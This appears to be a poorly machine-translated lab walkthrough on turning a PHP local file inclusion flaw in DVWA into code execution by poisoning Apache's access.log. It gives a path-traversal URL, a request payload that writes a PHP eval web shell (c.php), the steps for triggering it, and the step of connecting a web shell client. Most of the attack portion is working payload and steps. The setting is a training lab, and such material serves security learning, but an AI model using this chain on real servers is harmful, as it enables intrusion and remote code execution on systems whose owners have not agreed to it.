Log File Vulnerability principle
when there is a local file inclusion vulnerability in PHP, but can not upload files properly, which means that there could not contain loopholes exploited at all, then the attacker could be exploited apache log files to the invasion.
After running the Apache server generates two log files, these two files are access.log (access logs) and error.log (error logs), under the apache log file records of our operation, and writes access log filesaccess.log
in
E.g:http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=../../../../Apache-20\logs\access.log
lab environment:
- PHPstudy
- DVWA Range
- Burp Suite capture software | Download | Tutorial |
- kitchen knife
Environment configuration:
Open the Apache configuration file
Search CustomLog "logs/access.log" common
the previous comment removed, and then restart PHPstudy
Simulation:
1, in the current Web page capture
2, is sent to Repeater
module
3, change the url <?php $file = fopen('c.php','w');fputs($file,'<?php @eval($_REQUEST[666]);?>')?>
and then click GO
4, access C:\\phpStudy\\PHPTutorial\\Apache\\logs\\access.log
paths, following the successful implementation of FIG.
5, in fi
case the input c.php?666=phpinfo();
successfully executed
6, the use of choppers connected copy url